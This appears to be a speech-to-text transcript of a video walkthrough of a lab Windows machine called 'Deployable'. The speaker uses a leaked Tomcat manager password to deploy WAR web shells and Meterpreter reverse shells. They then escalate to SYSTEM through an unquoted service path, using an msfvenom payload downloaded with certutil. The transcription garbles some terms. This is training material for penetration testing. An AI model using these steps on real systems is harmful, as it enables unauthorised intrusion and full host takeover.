Welcome back. In today's video, we are going to solve another Windows machine, right here. The name is Deployable, and it is Windows box. The machine is powered on. Let's hop in. So basically, this is the Nmap scan. I used the vSwitch for scanning the services, S for Steel Scan, Ping Disable Discovery, and here's the IP. And we have got a couple of services. We have the SMB, we have Tomcat running on port 8080, and we have another web server, Apache, running on port 8009. So for this challenge, we will start with this one. So basically, we go to Firefox. Firefox has been launched. Now let's go to the IP. So basically 172.1.13. So this is the default page of Apache Tomcat. So basically, we're going to assume that we need admin access to the web server in order to complete the enumeration and thus do the exploitation. So basically, to have admin access, we need to have access to the manager app in order to upload our own app. So we click on manager app and we are prompted with the authentication. So if we tried something like admin, we click OK, nothing. If we click cancel, it's gonna throw an error, authentication error, that we are not allowed or authorized to log into the requested page. But there is a credential leak here. As you can see, we have the username Tomcat and the password is secret. This is a rudimentary credential leak vulnerability actually. So we take the password, we copy that, and the username is Tomcat. So we go back, click on Manager App. So type Tomcat and then type the password, hit OK, and we have logged in successfully. So we have demonstrated before how to exploit Tomcat once given the admin access. So all we have to do here to understand how Tomcat, the language that is based on Tomcat, so basically it's GSP, JavaScript. So all we have to do here to upload our own payload and to host the payload as an application like these ones. Then we're gonna launch our payload. So to do that, we have two options. The first one, as you guessed from the last videos, we went to Metasploit, MSF Venom, so let's clear that. Sudo MSF Venom, Venom-P Windows interpreter reverse TCP lhost 10.07. I'm not sure if config. Yes, so collapse. Okay. Lport 455, and then we type the extension, which is going to be war, and then we type the resultant file. It's going to be something like payload.war. Once we click enter, the file will be generated, the war file, and then we can upload that and launch the reverse shell. But we're going to do that in another way in this video. So let's cancel this. I don't like repetitive stuff. So we go back and we jump into Firefox. We go to Hacktricks, and we click on that. So once we land on the page, we click on search, type Tomcat, go down, default credential username, RCE, click on RCE. All right, so we see here a couple of stuff to try. We have the Metasploit method, right? And we have the manual method. If we go down, we have the manual one, which is this one. So as a learner, I prefer to try with this one, right? I prefer you to try with this one. Let's take that, okay, and copy it to a GSP file. We can take this, right, and go back to the terminal. And here we type something like nano or sudo nano payload.gsp, and we paste the payload here. We save that. And next, we need to make that payload in a WAR file, right? So why? Because if you go back, you see here the Tomcat accepts only WAR files. So we need to convert, or let me say it in more. It makes more sense to say that you compress that into a WAR file. Okay. So basically, what we're gonna do now, we're gonna go back here, and then we're gonna make some directory like payload Tomcat cd payload. All right. Okay, then we're gonna copy that payload here. Sudo payload.gsp into payload Tomcat. Oh, okay. CP. All right. Then go to payload Tomcat. So we have this payload here. All we have to do now is to compress it into a WAR file. To do that, we type sudo jar -cvf, and here we type the resultant file will be something like I don't know. So Tomcat shell.war. So basically, we have created the payload here, as you can see right from the GSP code. Now you can go to the browser, upload, browse. This is the one. Click deploy, and then we browse to the payload, which is here. We type the name of the payload, and from here you can run your own commands like netcat, reverse shell, web shell, whatsoever. This is the first option. The second option now is using Metasploit. So clear MSF console, which is the preferred way if you are in a pen test, right? Real pen test to save time, and you can create your own payload or you can exploit with Metasploit. Then it's better to save your own time and put the learning purposes aside. You can do that on your own time. If you want to learn, do the manual method. But in real pen test, do the quickest way. It's better. So here we search for search type exploit name Tomcat. So what do we have here? We have GSP upload bypass, deploy authenticated code execution, upload code. We have many actually. So we're gonna opt for this one. Let's use that. So what was this? Okay, use show options. I guess I need the one that requires me to put username and password. So I'm gonna opt out of this. I don't want this. Okay, so we're gonna like that, and I'm gonna take this multi HTTP manager Tomcat deploy, which is authenticated code execution. That's great. Use show options. So here I have the username and password. Let's set the username. Set admin, and the password set. And here I don't know, the password is something like, let me go back. There's a logout button here. Nope. Host manager. Cancel. So here's the password. We take that, go back, and we have also the rhost. Set rhost. It's going to be the IP address of the host. 172.31.1.13. Set our port, and we run. And able to automatically set targets. So here, show targets. Set targets 1. Run. Then we go back to Hactrix. So we are on the right Tomcat manager upload, which is the right exploit, right? So go back. No, we are on deploy. So I think we're gonna try the other one. So this one, Tomcat manager upload. Take that, use, show options, and we grab the password, set the password is secret. That is really frustrating. I don't know why it's not copying. Copy the fucking password. Okay. Go back, paste, set, and here we have the username. Admin set our hosts 172.31.13. Set our port 8080. Our port. And exploit. And able to access Tomcat Manager. So what's wrong now? Our ports, so we have our hosts, our ports. That's really weird. Let's go back to Hactrix. Let's make sure the parameters are correct. 172.31, 1.13. The output is 8080. Username, password. Do we have an SSL here? Let me check. Nope. Okay, so I'm going to cancel that. As I said, in pen test, you don't have time to try for indefinitely. So we're going to exit, clear, and we're going to generate a payload manually. MSF, or I think we have the payload here. Okay. Yeah, keep this like that, and we're going to change the extension to war and the name to payload2.war. All right, Now we're going to head back and go to deploy. That is great. Let's now find out what is the name of the payload. So ls sudo java and payload 2.war. Unrecognized option. So let's now find the name of the payload from this file, from the war file. So we type sudo jar-xvf, and here we type the name 2.war. So the name is jet something. So let's type that in the browser, but before we click enter, we need to prepare our listener. So basically here the payload, and before navigating to that GSP payload, let's go back and launch MSF console. I don't think I need sudo, so MSF console. All right, use exploit multi handler set a Windows interpreter reverse TCP sets lhost and let's migrate set auto run script host Windows manage migrate and we run. Let's go back, trigger the payload, and we receive the interpreter session. Now the next step is to do privilege escalation. So basically you have three options to do the exploitation. You have the manual one. The manual one, I'm gonna state back where you would get this. So basically you will get this one, right? Put it in a GSP file, compress it in a WAR file, upload it the same way we did, and launch your own commands like netcat, homi. The second option is to use the Metasploit, this module, but for me it doesn't work, no reason why, and there is no time to try forever. The third option is you do this one with MSF Venom. So you have a couple of options, you have many stuff to try. So basically the next step is to do privilege escalation. All right, so get UID. So we are Tomcat deployable. So basically now for this challenge, the privilege escalation vector here is there is an unquoted service. So let's explain what does unquoted service. Let's find out first. Let's enumerate the services and find that unquoted service that will lead to privilege escalation. So let me open my manual here and let me go to PowerShell. PowerShell. Now searching through this manual is becoming very hard. Okay, so PowerShell. Okay, that is good. Now we need to find the non-standard services. So basically, let's go down, find the appropriate command. Okay, that is good. Let's grab this. Go down. Okay, here. Oh, what was this? Okay, let's copy this first. Or I think this is enough. Um, Shell. Okay, then go back to manual. Grab this for me. All of this. Okay. And let's find out. All right, so the service that stands out is this one. As you can see, it is C program files deploy ready service files deploy.exe. This is the non-standard service, right, that is uncoded. As you can see here, the services are coded. This one has codes. Now this one doesn't have codes. What does that mean? It means that when the service executes the executable here, this is the executable that is handled by the service, right, used to start the service. So when we say, okay, start deploy, because there are no codes here, it's gonna say, okay, let me search for deploy.exe. It's gonna start like that. Program from here, program.exe. Is this here? No. Okay. I'm gonna try then program files deploy.exe. Then it's gonna try service.exe as I'm highlighting. Nothing found. It's gonna now launch deploy. And that is the flow here. If we can place an executable file, right, of our choice, of our made, we make this file, we make this binary malicious payload, and we name it either program.exe or deploy.exe or service.exe. If we can create this payload, right, or this executable file under one of the three mentioned names, and we can put this file in a directory that is writable by us, meaning that writable by the user who is Tomcat. Then we can connect back to our own, we can create a connection to our command and control center. So let's first check if we have write access to one of these directories. Let's now navigate to program files. Okay, cd. Okay, so we have deploy ready. Let's see if we have write access to that directory. If we have, we're going to create a malicious payload under the name deploy. Okay, so icacls, and here deploy ready. So what has it gone wrong here? Parameter, oh, invalid parameter ready. Okay, I think I made some mistake here. icacls, and it goes like that. We put the full path. Take the backslash, and the directory name is deploy ready. Um, okay, so based on the current services here, we are the users here, right? So I don't see we have write access to that directory. Now the next candidate for our malicious act is the service directory. So we go now to cd deploy ready. All right, so we have here Dropbox, we have service file. Let's see if we can write to that directory. So I see ACLS, and we grab the full path. Service files. So here the handle is invalid. So I couldn't get an output for this command. So okay, let's try. So we split the terminal here horizontally, and here sudo msfvenom. Let's create a payload of our own and try to place that payload right. Let's name it first service. It needs to be named like this one. So service, right? So here 4546 because we are using this port for the current connection. And now let's create this payload. Now, then we're going to download that to the remote host. So here Python 3-m http.server. Now cert hotel-url cache -f http 10.10.07 and here the file is service.exe service.exe. Oh, yeah, all the time. My regular typos. So here we're gonna copy that. Cert util and the file or the binary has been downloaded. Now the next step is to execute that, right? So we're gonna Control C here, clear MSF console. Or I don't think we need that. Let's exit. So here we collapse, and here we type yes. So, or yeah, actually I made a mistake. Let me drop back to shell. We need the second instance of the Metasploit. So horizontal, MSF console. And while in there, let's cd back to the directory. So we have the payload right here. We are able to download here, but I think we need to rename it. Okay, so here use exploit multi handler set payload Windows. Migrate and we run. Okay, now we need to move that to the service files. Let me do another one here. No, collapse this. Split horizontally, and here we're gonna list. So we have where is our payload? This one. So Python 3-m http.server server cd to service files. Access denied. Okay. All right, so access denied to service files. All right, I think I don't need to do that. Let me rely on this. So here we have, okay, cert hotel dash your cache HTTP. And here the name of the payload was something like, I think, oh, okay, sudo move service to deploy. Now we are good. So here it's going to be deploy.exe, deploy.exe. All right. Now, before executing the payload, as we said, guys, because the service path is uncoded, when we start the service, it's gonna say the execution path will look like this. It's gonna first start looking for program.exe. Program.exe doesn't exist, right? Then it's gonna look for deploy.exe. And here you go, we have deploy.exe, which is our own payload, right? That's the flow. All right, so here we're gonna type now, we're gonna start the service, right? Once we start the service, it's gonna execute our own malicious file because it comes first on the execution path. So sc start deploy. Oh, what? Oh, okay. Sc start deploy. So we received now the interpreter session, and we will have escalate our privileges actually. So we're now migrating to avoid the session die. So get UID. Oh, not here. Here. Okay. Get UID. And we are net authority system. So I hope this video was enjoyable, and I hope you learned what is uncoded services and how you can find it and exploit it. All right. So thank you so much, and see you in the next video.